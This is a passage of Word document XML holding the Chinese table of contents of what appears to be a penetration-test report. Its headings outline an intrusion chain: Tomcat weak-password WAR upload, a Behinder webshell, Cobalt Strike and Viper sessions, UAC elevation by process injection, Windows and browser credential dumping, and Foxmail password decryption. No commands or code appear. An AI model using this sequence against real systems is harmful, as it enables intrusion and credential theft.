          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击命令：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1475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_Toc10130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二十二、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>搜索可利用CVE</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc10130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_Toc21967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二十三、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.xx.xx.64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">:8080 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dxxxxsxxxbxxx</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21967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_Toc23052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23.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc23052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_Toc685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23.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc685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_Toc563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23.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc563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_Toc2837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23.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>浏览器凭证：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2837 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>20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_Toc16128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23.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16128 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>20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_Toc18616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23.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Window内存凭证</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18616 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>21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_Toc18328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23.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启WDigest后:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18328 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>21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_Toc4499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23.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看保存凭证</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4499 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>21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_Toc20416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23.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程桌面</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc20416 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>22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_Toc12557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23.6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启远程桌面</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12557 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>22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_Toc10519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23.6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功连接</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc10519 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>22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_Toc20202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23.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cs上线</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc20202 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>23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_Toc18914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23.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进程注入：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18914 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>23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_Toc14816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23.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程VNC</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14816 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>23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_Toc16356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23.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过Chrome浏览器收藏的书签url链接获取密码表</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16356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_Toc465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23.10.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>批量打开url链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url.bat脚本</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc465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_Toc32332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二十四、 </w:t>
      </w:r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:8089 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mxxhxxbxx</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32332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_Toc18307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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞入口:Tomcat弱口令+上传war包</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18307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_Toc24472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24.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fscan扫描结果</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24472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_Toc27938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24.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过弱口令成功上传war包</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc27938 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>24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_Toc28757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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Behinder 上线</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28757 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>25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_Toc7090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24.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UAC提权,多试试注入svchost.exe进程的会话</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7090 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>25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_Toc4458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24.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>有两个新会话产生Viper上线信息：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4458 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>26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_Toc17608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24.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Foxmail邮箱账号密码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc17608 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>26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_Toc14671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24.5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>搜索：Account.rec0</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14671 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>26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_Toc2888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24.5.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解密：Account.rec0</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2888 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>26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_Toc13405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24.5.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>邮箱成功登录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc13405 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>27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_Toc4876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24.5.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果汇总</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4876 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>27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_Toc1128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24.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1128 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>28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_Toc30347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24.6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>详情：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc30347 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>28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_Toc16945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24.6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>产生新会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16945 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>28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_Toc23297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24.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看进程路径位置：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc23297 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>28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_Toc14206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24.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>获取Windows内存Hash</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14206 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>29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_Toc7854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24.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>获取Windows内存密码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7854 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>29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_Toc24278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24.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启WDigest后：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24278 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>30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_Toc14879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24.10.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第一次获取</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14879 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>30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_Toc7732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24.10.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第二次获取，2022.11.22</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7732 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>30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_Toc29851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24.11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程桌面3389</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29851 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>30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_Toc31783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24.12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取Windows System权限：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31783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_Toc19758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24.13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加载Powershell插件</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc19758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_Toc19269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24.14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进入cmd</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc19269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_Toc17647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24.14.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看所有会话：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc17647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_Toc26069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24.14.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>选择会话id：16</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc26069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_Toc23654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24.14.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进入cmd</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc23654 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>31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_Toc9240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24.14.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试:ipconfig</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9240 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>32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_Toc25925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24.15 </w:t>
      </w:r>
      <w:r>
